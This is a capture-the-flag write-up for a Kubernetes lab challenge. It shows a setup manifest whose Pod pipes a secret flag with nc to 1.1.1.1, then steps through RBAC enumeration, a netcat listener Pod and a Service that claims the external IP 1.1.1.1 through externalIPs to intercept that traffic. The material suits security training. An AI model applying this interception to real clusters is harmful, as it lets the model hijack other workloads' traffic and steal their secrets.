Hungry Helmsman (37C3 Potluck CTF)

1. Environment Setup

Deploy a single control-plane cluster with kind:

kind create cluster --image kindest/node:v1.23.4
docker pull busybox
kind load docker-image --name kind busybox:latest
kubectl apply -f challenge.yaml

(screenshot: Pasted image 20250418152040)

#challenge.yaml

# create namespace flag-reciever
apiVersion: v1
kind: Namespace
metadata:
  name: flag-reciever
  labels:
    pod-security.kubernetes.io/enforce: "restricted"
---
# create namespace flag-sender
apiVersion: v1
kind: Namespace
metadata:
  name: flag-sender
---
# create sa ctf-player
apiVersion: v1
kind: ServiceAccount
metadata:
  name: ctf-player
---
# create flag secret
apiVersion: v1
kind: Secret
metadata:
  name: flag
  namespace: flag-sender
type: Opaque
data:
  flag: cG90bHVja3trdWJlcm5ldGVzX2Nhbl9iZV9hX2JpdF93ZWlyZH0=
---
# create flag-sender pod
apiVersion: apps/v1
kind: Deployment
metadata:
  name: flag-sender
  namespace: flag-sender
  labels:
    app: flag-sender
spec:
  replicas: 1
  selector:
    matchLabels:
      app: flag-sender
  template:
    metadata:
      labels:
        app: flag-sender
    spec:
      containers:
      - name: container
        image: docker.io/library/busybox:latest
        imagePullPolicy: IfNotPresent
        command:
        - sh
        args:
        - -c
        - while true; do echo $FLAG | nc 1.1.1.1 80 || continue; echo 'Flag Send'; sleep 10; done
        env:
        - name: FLAG
          valueFrom:
            secretKeyRef:
              name: flag
              key: flag
      restartPolicy: Always
      serviceAccountName: default
      dnsPolicy: ClusterFirst
      securityContext: {}
---
# create network policy
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: flag-reciever
  namespace: flag-reciever
spec:
  ingress:
  - from:
    - namespaceSelector:
        matchLabels:
          ns: flag-sender
      podSelector:
        matchLabels:
          app: flag-sender
  podSelector: {}
  policyTypes:
  - Ingress
  - Egress
---
# setup rbac
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: ctf-player
rules:
- apiGroups: [""]
  resources: ["namespaces"]
  verbs: ["list"]
- apiGroups: [""]
  resources: ["pods"]
  verbs: ["list"]
- apiGroups: [""]
  resources: ["services"]
  verbs: ["list"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: ctf-player
subjects:
- kind: ServiceAccount
  name: ctf-player
  namespace: default
roleRef:
  kind: ClusterRole
  name: ctf-player
  apiGroup: rbac.authorization.k8s.io
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  namespace: flag-reciever
  name: ctf-player
rules:
- apiGroups: [""]
  resources: ["pods.*"]
  verbs: ["create", "delete"]
- apiGroups: [""]
  resources: ["pods"]
  verbs: ["get", "create", "delete"]
- apiGroups: [""]
  resources: ["pods/log"]
  verbs: ["get"]
- apiGroups: [""]
  resources: ["services.*"]
  verbs: ["create", "delete"]
- apiGroups: [""]
  resources: ["services"]
  verbs: ["get", "create", "delete"]
- apiGroups: ["networking.k8s.io"]
  resources: ["networkpolicies"]
  verbs: ["list", "get"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: ctf-player
  namespace: flag-reciever
subjects:
- kind: ServiceAccount
  name: ctf-player
  namespace: default
roleRef:
  kind: Role
  name: ctf-player
  apiGroup: rbac.authorization.k8s.io
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  namespace: flag-sender
  name: ctf-player
rules:
- apiGroups: [""]
  resources: ["pods", "pods/log"]
  verbs: ["get"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: ctf-player
  namespace: flag-sender
subjects:
- kind: ServiceAccount
  name: ctf-player
  namespace: default
roleRef:
  kind: Role
  name: ctf-player
  apiGroup: rbac.authorization.k8s.io

Create a kubeconfig for the ctf-player ServiceAccount (the player's identity):

cat << EOF > kubeconfig-ctf-player.yaml
apiVersion: v1
clusters:
- cluster:
    insecure-skip-tls-verify: true
    server: $(kubectl config view --minify -o jsonpath='{.clusters[0].cluster.server}')
  name: ctf-cluster
contexts:
- context:
    cluster: ctf-cluster
    user: ctf-player
  name: ctf-cluster
current-context: ctf-cluster
kind: Config
preferences: {}
users:
- name: ctf-player
  user:
    token: $(kubectl create token ctf-player)
EOF
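
A quick sanity check that the token works (note: kubectl create token was added in kubectl v1.24, so a reasonably recent client is needed even against this 1.23 cluster):

# the ClusterRole defined above should allow listing namespaces
kubectl --kubeconfig kubeconfig-ctf-player.yaml auth can-i list namespaces
# expected output: yes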

2. Writeup

2.1. Check permissions in the default namespace

kubectl --kubeconfig kubeconfig-ctf-player.yaml auth can-i --list

(screenshot: Pasted image 20250418152526)

Now check the same user's permissions against the kube-system namespace:

(screenshot: Pasted image 20250418152815)

The two permission lists are identical, which strongly suggests that the role behind kubeconfig-ctf-player.yaml is cluster-scoped: permission A (a ClusterRole).
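
One quick way to test the cluster-scope hypothesis with nothing but the permissions we already have (a sketch; any namespace name works):

# a namespaced Role would answer "no" outside its namespace;
# a ClusterRoleBinding answers "yes" everywhere
kubectl --kubeconfig kubeconfig-ctf-player.yaml auth can-i list pods -n kube-system
kubectl --kubeconfig kubeconfig-ctf-player.yaml auth can-i list pods --all-namespaces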

2.2. List the other namespaces

kubectl --kubeconfig kubeconfig-ctf-player.yaml get ns

(screenshot: Pasted image 20250418153024)

2.3. Check permissions in the other namespaces

kubectl --kubeconfig kubeconfig-ctf-player.yaml auth can-i --list -n flag-reciever

The current user has fairly powerful permissions in the flag-reciever namespace: permission B (a Role scoped to flag-reciever).
(screenshot: Pasted image 20250418153145)

Hint

pods.*: meant to cover all Pod-related resources, including create, delete, and so on. (Note that the standard RBAC spelling for subresources is resource/subresource, e.g. pods/log; see the sketch below.)
pods: covers only the pods resource itself, not its subresources.
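
For comparison, a minimal sketch of the standard RBAC subresource form (log-reader is a hypothetical role name, not part of the challenge):

# hypothetical example: read pods and, separately, their log subresource
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: log-reader            # hypothetical example role
  namespace: flag-reciever
rules:
- apiGroups: [""]
  resources: ["pods"]         # the pods resource itself
  verbs: ["get", "list"]
- apiGroups: [""]
  resources: ["pods/log"]     # the log subresource must be granted explicitly
  verbs: ["get"]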

Next, check the permissions in the flag-sender namespace:

kubectl --kubeconfig kubeconfig-ctf-player.yaml auth can-i --list -n flag-sender

The current user has the following permissions in the flag-sender namespace: permission C (a Role scoped to flag-sender).
(screenshot: Pasted image 20250418153336)

At this point we have found that the current user holds three sets of permissions, summarized in the note below (with a one-shot re-check right after it):

Note
  • Permission A: cluster-scoped (ClusterRole)
  • Permission B: scoped to the flag-reciever namespace (includes high-risk verbs)
  • Permission C: scoped to the flag-sender namespace
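
To re-check all three in one go, loop over the namespaces (a convenience sketch):

for ns in default flag-reciever flag-sender; do
  echo "=== $ns ==="
  kubectl --kubeconfig kubeconfig-ctf-player.yaml auth can-i --list -n "$ns"
done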

2.4. List the Pods

# use permission A (the ClusterRole) to list Pods in all namespaces
kubectl --kubeconfig kubeconfig-ctf-player.yaml get pods -A

One Pod stands out as suspicious:
(screenshot: Pasted image 20250418153704)

2.5. Inspect the Pod

kubectl --kubeconfig kubeconfig-ctf-player.yaml -n flag-sender get pod flag-sender-854544d56f-njd6v -o yaml

(screenshot: Pasted image 20250418153953)
The busybox container echoes the FLAG environment variable (populated from the flag Secret) and pipes it via nc to 1.1.1.1 port 80. The goal, then, is to intercept the traffic destined for 1.1.1.1:80.
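
Instead of scanning the full YAML, the interesting fields can be pulled out directly with jsonpath (pod name as observed above; it changes whenever the Deployment recreates the Pod):

kubectl --kubeconfig kubeconfig-ctf-player.yaml -n flag-sender get pod flag-sender-854544d56f-njd6v \
  -o jsonpath='{.spec.containers[0].args}{"\n"}{.spec.containers[0].env}{"\n"}'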

Info

If we could exec into the flag-sender-854544d56f-njd6v Pod, we could read FLAG straight from its environment.
But our permissions in that namespace are minimal (screenshot: Pasted image 20250418154408): only get/list, no pods/exec, so we cannot get a shell there and have to find another way.

2.6. Approach 1: ClusterIP

Redirect the in-cluster traffic destined for 1.1.1.1:80 to port 8080 of a Pod we control (busyboxtest), then have busyboxtest listen on 8080 and capture the flag from the stream.
This requires the ability to create Services and Pods, which we do have in the flag-reciever namespace (screenshot: Pasted image 20250418155107).

Create the Pod:

kubectl --kubeconfig kubeconfig-ctf-player.yaml apply -f busybox-test.yaml
#busybox-test.yaml
apiVersion: v1
kind: Pod
metadata:
  creationTimestamp: null
  labels:
    run: busyboxtest   # matched by the Service selector below
  name: busyboxtest
  namespace: flag-reciever
spec:
  securityContext:   # needed to satisfy the "restricted" Pod Security level enforced on flag-reciever
    runAsNonRoot: true
    runAsUser: 1000
    seccompProfile:
      type: RuntimeDefault
  containers:
  - image: busybox
    name: busyboxtest
    args: [/bin/sh, -c, 'nc -lp 8080']   # listen on 8080; received data goes to stdout, i.e. the Pod log
    ports:
    - containerPort: 8080
      name: http-web-svc
    securityContext:
      allowPrivilegeEscalation: false
      capabilities:
        drop:
        - ALL
    resources:
      limits:
        cpu: "100m"
        memory: "0Mi"
      requests:
        cpu: "100m"
        memory: "0Mi"
  dnsPolicy: ClusterFirst
  restartPolicy: Always
status: {}
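
Check that the Pod was admitted (hence the securityContext above) and is running:

kubectl --kubeconfig kubeconfig-ctf-player.yaml -n flag-reciever get pod busyboxtest
# STATUS should be Running; an admission error here means the securityContext is wrong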

Create a Service to set up the traffic redirection:

kubectl --kubeconfig kubeconfig-ctf-player.yaml -n flag-reciever apply -f service.yaml
#service.yaml
apiVersion: v1
kind: Service
metadata:
  name: my-custom-service
spec:
  type: ClusterIP
  clusterIP: 1.1.1.1  # note: normally auto-assigned (or None); here we try to claim 1.1.1.1 directly
  ports: # forward Service port 80 to the Pod's port 8080
    - port: 80
      targetPort: 8080
  selector:
    run: busyboxtest # binds the Service to the Pod via its label

But this is rejected:
(screenshot: Pasted image 20250418155949)
The reason: the IP we chose falls outside the cluster's service CIDR (10.96.0.0/16), so the API server refuses the clusterIP. The approach itself is sound, though.
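
Side note: with admin access to the kind host, the actual service CIDR can be read off the apiserver flags (assuming the default control-plane container name kind-control-plane):

docker exec kind-control-plane \
  grep service-cluster-ip-range /etc/kubernetes/manifests/kube-apiserver.yaml
# typical output: - --service-cluster-ip-range=10.96.0.0/16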

Once the Service is successfully created (see approach 2 below), the pods/log permission we hold on the flag-reciever namespace is enough to read the forwarded flag from the Pod's log. (screenshot: Pasted image 20250418160230)

2.7. Approach 2: externalIPs

We cannot claim an arbitrary in-cluster IP, but we can claim an external one.
The externalIPs field of a Service lists external IP addresses for which the cluster will route traffic to that Service.

kubectl --kubeconfig kubeconfig-ctf-player.yaml apply -f service.yaml
#service.yaml
apiVersion: v1
kind: Service
metadata:
  name: my-custom-service
  namespace: flag-reciever # the namespace must be specified here
spec:
  externalIPs: # use externalIPs in place of the clusterIP
    - 1.1.1.1 # must be a YAML list; the inline form externalIPs: 1.1.1.1 is invalid
  ports:
    - port: 80
      targetPort: 8080
  selector:
    run: busyboxtest

Info

External request: a client sends traffic to http://1.1.1.1:80.
Service forwarding: the Service forwards the request to the Pods labeled run=busyboxtest.
Pod handling: the application inside the Pod receives the request on port 8080.

# inspect the Service objects across namespaces
kubectl --kubeconfig kubeconfig-ctf-player.yaml get svc -A

(screenshot: Pasted image 20250418161516)
With the Service in place, read the log of the Pod that receives the redirected traffic:

kubectl --kubeconfig kubeconfig-ctf-player.yaml -n flag-reciever logs busyboxtest

(screenshot: Pasted image 20250418161846)
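
One caveat worth knowing: busybox's nc -lp exits after the first connection, so the container restarts (restartPolicy: Always) after every capture; if the current log looks empty, the flag may be sitting in the previous container's log:

kubectl --kubeconfig kubeconfig-ctf-player.yaml -n flag-reciever logs busyboxtest --previous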

2.8. How it all fits together

  1. Inside the flag-sender-854544d56f-lsjcc Pod, the loop keeps sending the flag to 1.1.1.1:80 via nc.
  2. Because the Service declares externalIPs: [1.1.1.1], the cluster treats 1.1.1.1 as one of that Service's external IPs and routes the traffic to it.
  3. The Service forwards the traffic from the flag-sender-854544d56f-lsjcc Pod to the Pod matching the label run=busyboxtest, i.e. busyboxtest, which logs the flag.
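
In short, with the file names used above, the whole exploit is three commands:

# 1. listener Pod in flag-reciever (compliant with the restricted Pod Security level)
kubectl --kubeconfig kubeconfig-ctf-player.yaml apply -f busybox-test.yaml
# 2. Service that claims 1.1.1.1:80 via externalIPs and forwards to the listener
kubectl --kubeconfig kubeconfig-ctf-player.yaml apply -f service.yaml
# 3. read the captured flag from the listener's log
kubectl --kubeconfig kubeconfig-ctf-player.yaml -n flag-reciever logs busyboxtest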